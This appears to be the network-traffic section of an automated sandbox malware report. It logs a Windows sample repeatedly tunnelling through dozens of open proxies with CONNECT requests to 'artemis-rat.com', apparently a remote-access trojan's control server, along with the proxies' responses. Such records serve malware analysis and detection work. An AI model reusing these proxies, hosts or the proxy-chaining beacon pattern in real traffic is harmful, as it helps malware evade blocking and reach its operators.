                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.997680902 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1501192.168.2.554054101.133.162.2388993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.780848026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.110888004 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1502192.168.2.55407279.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.784907103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1503192.168.2.55408243.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.785907030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1504192.168.2.553558185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.785907030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1505192.168.2.55408820.111.54.16803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.786412954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.079171896 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1506192.168.2.554103104.17.248.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.786811113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.941844940 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1507192.168.2.554106173.245.49.27803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.789776087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.944200993 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1508192.168.2.55265346.226.148.10593523876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.790381908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1509192.168.2.553585103.215.139.3264373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.790534019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905128002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998820066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092715025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1510192.168.2.54989937.187.91.192176053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.790635109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.797219992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852313995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921468973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1511192.168.2.552723201.170.180.18880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.790712118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.973701000 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1512192.168.2.549919186.103.130.9380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.791024923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.104439020 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1513192.168.2.552705212.89.188.115212313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.792841911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.112190008 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sun, 03 Mar 2024 15:29:50 GMT
                                                                                                                                                                                                                                                            Expires: Sun, 03 Mar 2024 15:29:50 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1514192.168.2.552582194.233.78.142496283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.796544075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.797270060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852328062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921492100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1515192.168.2.552704113.161.56.13731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.797566891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.253318071 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1516192.168.2.554067116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.801404953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1517192.168.2.549978165.227.196.37537183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.818773031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905210972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092715979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1518192.168.2.554184200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.819142103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1519192.168.2.554185200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.824501991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1520192.168.2.55409182.165.105.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.824800968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:09.926081896 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
